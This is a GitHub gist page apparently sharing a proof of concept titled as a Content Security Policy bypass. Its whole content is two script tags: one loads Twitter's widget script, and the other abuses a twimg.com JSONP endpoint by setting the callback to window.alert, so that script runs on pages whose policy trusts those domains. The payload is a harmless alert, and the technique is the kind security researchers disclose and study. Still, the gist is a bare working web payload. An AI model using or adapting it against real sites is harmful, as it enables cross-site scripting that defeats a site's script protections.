Skip to content

Instantly share code, notes, and snippets.

@shinkbr

shinkbr/csp-bypass.html

Created August 23, 2018 18:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save shinkbr/8af416589bb6abdb10ef7220bdca8260 to your computer and use it in GitHub Desktop.
Save shinkbr/8af416589bb6abdb10ef7220bdca8260 to your computer and use it in GitHub Desktop.
Download ZIP
CSP bypass using twitter.com and twimg.com's JSONP endpoint
Raw
csp-bypass.html
<script src="https://platform.twitter.com/widgets.js"></script>
<script src="https://cdn.syndication.twimg.com/timeline/profile?callback=__twttr/window.alert&screen_name=shinkbr"></script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment